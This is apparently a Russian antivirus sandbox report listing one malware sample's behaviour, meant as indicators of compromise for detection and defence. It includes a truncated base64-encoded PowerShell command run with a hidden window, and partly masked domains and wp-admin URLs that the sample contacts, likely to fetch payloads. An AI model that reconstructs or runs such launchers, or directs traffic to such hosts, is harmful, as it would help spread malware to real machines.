Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1424
- %TEMP%\791736.cvr
- 'wi###dcare.org':80
- 'gy###arbar.com':80
- 'gy###arbar.com':443
- 'be######terfilterplus.com':80
- 'my######egalservices.com':80
- 'ma###nanews.com':443
- http://gy###arbar.com/EDU/wBubLrB/
- http://be######terfilterplus.com/wp-admin/A/
- http://www.be######terfilterplus.com/wp-admin/A
- http://my######egalservices.com/wp-admin/87M/
- http://www.my######egalservices.com/wp-admin/87M/
- 'gy###arbar.com':443
- 'ma###nanews.com':443
- DNS ASK wi###dcare.org
- DNS ASK gy###arbar.com
- DNS ASK gi######sychicstudio.com
- DNS ASK be######terfilterplus.com
- DNS ASK my######egalservices.com
- DNS ASK be####nsafety.com
- DNS ASK ma###nanews.com
- DNS ASK li###usbbl.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKw... (со скрытым окном)